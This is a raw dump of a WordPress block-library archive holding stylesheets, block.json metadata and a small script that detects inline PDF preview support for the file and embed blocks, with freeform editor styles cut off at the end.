.wp-block-embed__wrapper:before{ padding-top:50%; } .wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{ padding-top:56.25%; } .wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{ padding-top:75%; } .wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{ padding-top:100%; } .wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{ padding-top:177.77%; } .wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{ padding-top:200%; }PK6[ǹembed/style.cssnu[.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{ max-width:360px; width:100%; } .wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{ min-width:280px; } .wp-block-cover .wp-block-embed{ min-height:240px; min-width:320px; } .wp-block-embed{ overflow-wrap:break-word; } .wp-block-embed figcaption{ margin-bottom:1em; margin-top:.5em; } .wp-block-embed iframe{ max-width:100%; } .wp-block-embed__wrapper{ position:relative; } .wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{ content:""; display:block; padding-top:50%; } .wp-embed-responsive .wp-has-aspect-ratio iframe{ bottom:0; height:100%; left:0; position:absolute; right:0; top:0; width:100%; } .wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{ padding-top:42.85%; } .wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{ padding-top:50%; } .wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{ padding-top:56.25%; } .wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{ padding-top:75%; } .wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{ padding-top:100%; } .wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{ padding-top:177.77%; } .wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{ padding-top:200%; }PK6[n//file/block.jsonnu[{ "apiVersion": 2, "name": "core/file", "category": "media", "attributes": { "id": { "type": "number" }, "href": { "type": "string" }, "fileName": { "type": "string", "source": "html", "selector": "a:not([download])" }, "textLinkHref": { "type": "string", "source": "attribute", "selector": "a:not([download])", "attribute": "href" }, "textLinkTarget": { "type": "string", "source": "attribute", "selector": "a:not([download])", "attribute": "target" }, "showDownloadButton": { "type": "boolean", "default": true }, "downloadButtonText": { "type": "string", "source": "html", "selector": "a[download]" } }, "supports": { "anchor": true, "align": true }, "editorStyle": "wp-block-file-editor", "style": "wp-block-file" } PK6[!file/editor.min.cssnu[.wp-block-file{align-items:center;display:flex;flex-wrap:wrap;justify-content:space-between;margin-bottom:0}.wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{height:auto}.wp-block-file .components-resizable-box__container{margin-bottom:1em}.wp-block-file .wp-block-file__preview{height:100%;margin-bottom:1em;width:100%}.wp-block-file .wp-block-file__preview-overlay{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-file .wp-block-file__content-wrapper{flex-grow:1}.wp-block-file a{min-width:1em}.wp-block-file a:not(.wp-block-file__button){display:inline-block}.wp-block-file .wp-block-file__button-richtext-wrapper{display:inline-block;margin-left:.75em}PK6[e file/style-rtl.min.cssnu[.wp-block-file{box-sizing:border-box}.wp-block-file:not(.wp-element-button){font-size:.8em}.wp-block-file.aligncenter{text-align:center}.wp-block-file.alignright{text-align:right}.wp-block-file *+.wp-block-file__button{margin-right:.75em}:where(.wp-block-file){margin-bottom:1.5em}.wp-block-file__embed{margin-bottom:1em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}PK6[Q;5 file/editor.cssnu[.wp-block-file{ align-items:center; display:flex; flex-wrap:wrap; justify-content:space-between; margin-bottom:0; } .wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{ height:auto; } .wp-block-file .components-resizable-box__container{ margin-bottom:1em; } .wp-block-file .wp-block-file__preview{ height:100%; margin-bottom:1em; width:100%; } .wp-block-file .wp-block-file__preview-overlay{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-file .wp-block-file__content-wrapper{ flex-grow:1; } .wp-block-file a{ min-width:1em; } .wp-block-file a:not(.wp-block-file__button){ display:inline-block; } .wp-block-file .wp-block-file__button-richtext-wrapper{ display:inline-block; margin-left:.75em; }PK6[~FSTTfile/view.min.asset.phpnu[ array(), 'version' => '8a0237493a27c0d781aa'); PK6[t^ file/view.jsnu["use strict"; (self["__WordPressPrivateInteractivityAPI__"] = self["__WordPressPrivateInteractivityAPI__"] || []).push([[81],{ /***/ 149: /***/ (function(__unused_webpack_module, __unused_webpack___webpack_exports__, __webpack_require__) { // EXTERNAL MODULE: ./node_modules/@wordpress/interactivity/src/index.js + 15 modules var src = __webpack_require__(754); ;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/file/utils/index.js /** * Uses a combination of user agent matching and feature detection to determine whether * the current browser supports rendering PDFs inline. * * @return {boolean} Whether or not the browser supports inline PDFs. */ const browserSupportsPdfs = () => { // Most mobile devices include "Mobi" in their UA. if (window.navigator.userAgent.indexOf('Mobi') > -1) { return false; } // Android tablets are the noteable exception. if (window.navigator.userAgent.indexOf('Android') > -1) { return false; } // iPad pretends to be a Mac. if (window.navigator.userAgent.indexOf('Macintosh') > -1 && window.navigator.maxTouchPoints && window.navigator.maxTouchPoints > 2) { return false; } // IE only supports PDFs when there's an ActiveX object available for it. if (!!(window.ActiveXObject || 'ActiveXObject' in window) && !(createActiveXObject('AcroPDF.PDF') || createActiveXObject('PDF.PdfCtrl'))) { return false; } return true; }; /** * Helper function for creating ActiveX objects, catching any errors that are thrown * when it's generated. * * @param {string} type The name of the ActiveX object to create. * @return {window.ActiveXObject|undefined} The generated ActiveXObject, or null if it failed. */ const createActiveXObject = type => { let ax; try { ax = new window.ActiveXObject(type); } catch (e) { ax = undefined; } return ax; }; ;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/file/view.js /** * WordPress dependencies */ /** * Internal dependencies */ (0,src/* store */.h)({ selectors: { core: { file: { hasPdfPreview: browserSupportsPdfs } } } }); /***/ }) }, /******/ function(__webpack_require__) { // webpackRuntimeModules /******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); } /******/ var __webpack_exports__ = (__webpack_exec__(149)); /******/ } ]);PK6[Afile/style.min.cssnu[.wp-block-file{box-sizing:border-box}.wp-block-file:not(.wp-element-button){font-size:.8em}.wp-block-file.aligncenter{text-align:center}.wp-block-file.alignright{text-align:right}.wp-block-file *+.wp-block-file__button{margin-left:.75em}:where(.wp-block-file){margin-bottom:1.5em}.wp-block-file__embed{margin-bottom:1em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}PK6[pfile/editor-rtl.cssnu[.wp-block-file{ align-items:center; display:flex; flex-wrap:wrap; justify-content:space-between; margin-bottom:0; } .wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{ height:auto; } .wp-block-file .components-resizable-box__container{ margin-bottom:1em; } .wp-block-file .wp-block-file__preview{ height:100%; margin-bottom:1em; width:100%; } .wp-block-file .wp-block-file__preview-overlay{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-file .wp-block-file__content-wrapper{ flex-grow:1; } .wp-block-file a{ min-width:1em; } .wp-block-file a:not(.wp-block-file__button){ display:inline-block; } .wp-block-file .wp-block-file__button-richtext-wrapper{ display:inline-block; margin-right:.75em; }PK6[$TTfile/view.asset.phpnu[ array(), 'version' => '3fd0154de23a0ecc28af'); PK6[Qvfile/editor-rtl.min.cssnu[.wp-block-file{align-items:center;display:flex;flex-wrap:wrap;justify-content:space-between;margin-bottom:0}.wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{height:auto}.wp-block-file .components-resizable-box__container{margin-bottom:1em}.wp-block-file .wp-block-file__preview{height:100%;margin-bottom:1em;width:100%}.wp-block-file .wp-block-file__preview-overlay{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-file .wp-block-file__content-wrapper{flex-grow:1}.wp-block-file a{min-width:1em}.wp-block-file a:not(.wp-block-file__button){display:inline-block}.wp-block-file .wp-block-file__button-richtext-wrapper{display:inline-block;margin-right:.75em}PK6[Dԁfile/view.min.jsnu["use strict";(self.__WordPressPrivateInteractivityAPI__=self.__WordPressPrivateInteractivityAPI__||[]).push([[81],{149:function(i,t,e){var n=e(754);const o=i=>{let t;try{t=new window.ActiveXObject(i)}catch(i){t=void 0}return t};(0,n.h)({selectors:{core:{file:{hasPdfPreview:()=>!(window.navigator.userAgent.indexOf("Mobi")>-1)&&(!(window.navigator.userAgent.indexOf("Android")>-1)&&(!(window.navigator.userAgent.indexOf("Macintosh")>-1&&window.navigator.maxTouchPoints&&window.navigator.maxTouchPoints>2)&&!((window.ActiveXObject||"ActiveXObject"in window)&&!o("AcroPDF.PDF")&&!o("PDF.PdfCtrl"))))}}}})}},function(i){var t;t=149,i(i.s=t)}]);PK6[#7file/style-rtl.cssnu[.wp-block-file{ box-sizing:border-box; } .wp-block-file:not(.wp-element-button){ font-size:.8em; } .wp-block-file.aligncenter{ text-align:center; } .wp-block-file.alignright{ text-align:right; } .wp-block-file *+.wp-block-file__button{ margin-right:.75em; } :where(.wp-block-file){ margin-bottom:1.5em; } .wp-block-file__embed{ margin-bottom:1em; } :where(.wp-block-file__button){ border-radius:2em; display:inline-block; padding:.5em 1em; } :where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{ box-shadow:none; color:#fff; opacity:.85; text-decoration:none; }PK6[<file/style.cssnu[.wp-block-file{ box-sizing:border-box; } .wp-block-file:not(.wp-element-button){ font-size:.8em; } .wp-block-file.aligncenter{ text-align:center; } .wp-block-file.alignright{ text-align:right; } .wp-block-file *+.wp-block-file__button{ margin-left:.75em; } :where(.wp-block-file){ margin-bottom:1.5em; } .wp-block-file__embed{ margin-bottom:1em; } :where(.wp-block-file__button){ border-radius:2em; display:inline-block; padding:.5em 1em; } :where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{ box-shadow:none; color:#fff; opacity:.85; text-decoration:none; }PK6[h޳freeform/block.jsonnu[{ "apiVersion": 2, "name": "core/freeform", "category": "text", "attributes": { "content": { "type": "string", "source": "html" } }, "supports": { "className": false, "customClassName": false, "reusable": false }, "editorStyle": "wp-block-freeform-editor" } PK6[>&&freeform/editor.min.cssnu[.wp-block-freeform.block-library-rich-text__tinymce{height:auto}.wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{line-height:1.8}.wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{margin-left:0;padding-left:2.5em}.wp-block-freeform.block-library-rich-text__tinymce blockquote{border-left:4px solid #000;box-shadow:inset 0 0 0 0 #ddd;margin:0;padding-left:1em}.wp-block-freeform.block-library-rich-text__tinymce pre{color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:15px;white-space:pre-wrap}.wp-block-freeform.block-library-rich-text__tinymce>:first-child{margin-top:0}.wp-block-freeform.block-library-rich-text__tinymce>:last-child{margin-bottom:0}.wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce a{color:var(--wp-admin-theme-color)}.wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{background:#e5f5fa;border-radius:2px;box-shadow:0 0 0 1px #e5f5fa;margin:0 -2px;padding:0 2px}.wp-block-freeform.block-library-rich-text__tinymce code{background:#f0f0f0;border-radius:2px;color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:14px;padding:2px}.wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{background:#ddd}.wp-block-freeform.block-library-rich-text__tinymce .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-freeform.block-library-rich-text__tinymce .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-freeform.block-library-rich-text__tinymce .aligncenter{display:block;margin-left:auto;margin-right:auto}.wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC);background-position:50%;background-repeat:no-repeat;background-size:1900px 20px;cursor:default;display:block;height:20px;margin:15px auto;outline:0;width:96%}.wp-block-freeform.block-library-rich-text__tinymce img::selection{background-color:transparent}.wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{-ms-user-select:element}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{margin:0;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{display:block}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{-webkit-user-drag:none}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{margin:0;padding-top:.5em}.wp-block-freeform.block-library-rich-text__tinymce .wpview{border:1px solid transparent;clear:both;margin-bottom:16px;position:relative;width:99.99%}.wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{background:transparent;display:block;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{display:none}.wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{border:1px dashed #ddd;padding:10px}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{word-wrap:break-word;border:1px solid #ddd;margin:0;padding:1em 0}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{margin:0;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{border-color:transparent}.wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{display:block;font-size:32px;height:32px;margin:0 auto;width:32px}.wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{clear:both;content:"";display:table}.wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce .gallery a{cursor:default}.wp-block-freeform.block-library-rich-text__tinymce .gallery{line-height:1;margin:auto -6px;overflow-x:hidden;padding:6px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{box-sizing:border-box;float:left;margin:0;padding:6px;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{margin:0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{font-size:13px;margin:4px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{width:100%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{width:50%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{width:33.3333333333%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{width:25%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{width:20%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{width:16.6666666667%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{width:14.2857142857%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{width:12.5%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{width:11.1111111111%}.wp-block-freeform.block-library-rich-text__tinymce .gallery img{border:none;height:auto;max-width:100%;padding:0}div[data-type="core/freeform"]:before{border:1px solid #ddd;outline:1px solid transparent;transition:border-color .1s linear,box-shadow .1s linear}@media (prefers-reduced-motion:reduce){div[data-type="core/freeform"]:before{transition-delay:0s;transition-duration:0s}}div[data-type="core/freeform"].is-selected:before{border-color:#1e1e1e}div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{margin-top:0;padding-top:0}div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{clear:both;content:"";display:table}.mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{color:#1e1e1e}.mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{margin-left:8px;margin-right:0}.mce-toolbar-grp .mce-btn i{font-style:normal}.block-library-classic__toolbar{border:1px solid #ddd;border-bottom:none;border-radius:2px;display:none;margin:0 0 8px;padding:0;position:sticky;top:0;width:auto;z-index:31}div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{border-color:#1e1e1e;display:block}.block-library-classic__toolbar .mce-tinymce{box-shadow:none}@media (min-width:600px){.block-library-classic__toolbar{padding:0}}.block-library-classic__toolbar:empty{background:#f5f5f5;border-bottom:1px solid #e2e4e7;display:block}.block-library-classic__toolbar:empty:before{color:#555d66;content:attr(data-placeholder);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:37px;padding:14px}.block-library-classic__toolbar div.mce-toolbar-grp{border-bottom:1px solid #1e1e1e}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{height:auto!important;width:100%!important}.block-library-classic__toolbar .mce-container-body.mce-abs-layout{overflow:visible}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{position:static}.block-library-classic__toolbar .mce-toolbar-grp>div{padding:1px 3px}.block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){display:none}.block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{display:block}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{height:50vh!important}@media (min-width:960px){.block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){height:9999rem}.block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{height:100%}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{height:calc(100% - 52px)}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{display:flex;flex-direction:column;height:100%;min-width:50vw}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{display:flex;flex-direction:column;flex-grow:1}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{flex-grow:1;height:10px!important}}.block-editor-freeform-modal__actions{margin-top:16px}PK6[gU**freeform/editor.cssnu[.wp-block-freeform.block-library-rich-text__tinymce{ height:auto; } .wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{ line-height:1.8; } .wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{ margin-left:0; padding-left:2.5em; } .wp-block-freeform.block-library-rich-text__tinymce blockquote{ border-left:4px solid #000; box-shadow:inset 0 0 0 0 #ddd; margin:0; padding-left:1em; } .wp-block-freeform.block-library-rich-text__tinymce pre{ color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:15px; white-space:pre-wrap; } .wp-block-freeform.block-library-rich-text__tinymce>:first-child{ margin-top:0; } .wp-block-freeform.block-library-rich-text__tinymce>:last-child{ margin-bottom:0; } .wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce a{ color:var(--wp-admin-theme-color); } .wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{ background:#e5f5fa; border-radius:2px; box-shadow:0 0 0 1px #e5f5fa; margin:0 -2px; padding:0 2px; } .wp-block-freeform.block-library-rich-text__tinymce code{ background:#f0f0f0; border-radius:2px; color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:14px; padding:2px; } .wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{ background:#ddd; } .wp-block-freeform.block-library-rich-text__tinymce .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-freeform.block-library-rich-text__tinymce .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-freeform.block-library-rich-text__tinymce .aligncenter{ display:block; margin-left:auto; margin-right:auto; } .wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{ background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC); background-position:50%; background-repeat:no-repeat; background-size:1900px 20px; cursor:default; display:block; height:20px; margin:15px auto; outline:0; width:96%; } .wp-block-freeform.block-library-rich-text__tinymce img::selection{ background-color:transparent; } .wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{ -ms-user-select:element; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{ margin:0; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{ display:block; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{ -webkit-user-drag:none; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{ margin:0; padding-top:.5em; } .wp-block-freeform.block-library-rich-text__tinymce .wpview{ border:1px solid transparent; clear:both; margin-bottom:16px; position:relative; width:99.99%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{ background:transparent; display:block; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{ display:none; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{ border:1px dashed #ddd; padding:10px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{ word-wrap:break-word; border:1px solid #ddd; margin:0; padding:1em 0; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{ margin:0; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{ border-color:transparent; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{ display:block; font-size:32px; height:32px; margin:0 auto; width:32px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{ clear:both; content:""; display:table; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce .gallery a{ cursor:default; } .wp-block-freeform.block-library-rich-text__tinymce .gallery{ line-height:1; margin:auto -6px; overflow-x:hidden; padding:6px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{ box-sizing:border-box; float:left; margin:0; padding:6px; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{ margin:0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{ font-size:13px; margin:4px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{ width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{ width:50%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{ width:33.3333333333%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{ width:25%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{ width:20%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{ width:16.6666666667%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{ width:14.2857142857%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{ width:12.5%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{ width:11.1111111111%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img{ border:none; height:auto; max-width:100%; padding:0; } div[data-type="core/freeform"]:before{ border:1px solid #ddd; outline:1px solid transparent; transition:border-color .1s linear,box-shadow .1s linear; } @media (prefers-reduced-motion:reduce){ div[data-type="core/freeform"]:before{ transition-delay:0s; transition-duration:0s; } } div[data-type="core/freeform"].is-selected:before{ border-color:#1e1e1e; } div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{ margin-top:0; padding-top:0; } div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{ clear:both; content:""; display:table; } .mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{ color:#1e1e1e; } .mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{ margin-left:8px; margin-right:0; } .mce-toolbar-grp .mce-btn i{ font-style:normal; } .block-library-classic__toolbar{ border:1px solid #ddd; border-bottom:none; border-radius:2px; display:none; margin:0 0 8px; padding:0; position:sticky; top:0; width:auto; z-index:31; } div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{ border-color:#1e1e1e; display:block; } .block-library-classic__toolbar .mce-tinymce{ box-shadow:none; } @media (min-width:600px){ .block-library-classic__toolbar{ padding:0; } } .block-library-classic__toolbar:empty{ background:#f5f5f5; border-bottom:1px solid #e2e4e7; display:block; } .block-library-classic__toolbar:empty:before{ color:#555d66; content:attr(data-placeholder); 